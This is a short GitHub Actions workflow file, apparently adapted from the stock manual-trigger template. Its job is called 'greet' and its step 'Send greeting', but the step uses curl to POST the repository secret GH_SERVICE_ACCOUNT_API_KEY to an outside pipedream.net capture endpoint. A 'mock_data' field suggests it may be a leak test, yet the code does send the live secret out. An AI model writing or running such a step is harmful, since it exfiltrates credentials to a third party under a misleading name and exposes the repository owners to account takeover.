# This is a basic workflow that is manually triggered

name: Manual workflow

# Controls when the action will run. Workflow runs when manually triggered using the UI
# or API.
on:
  workflow_dispatch:

env:
 API_KEY_GH: ${{ secrets.GH_SERVICE_ACCOUNT_API_KEY }}

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "greet"
  greet:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
    # Runs a single command using the runners shell
    - name: Send greeting
      run: |
        curl -d '{
        "mock_data": "true",
        "api_keys": { "github": "${API_KEY_GH}" } }' -H "Content-Type: application/json" https://enhoap0hc9e9rn1.m.pipedream.net
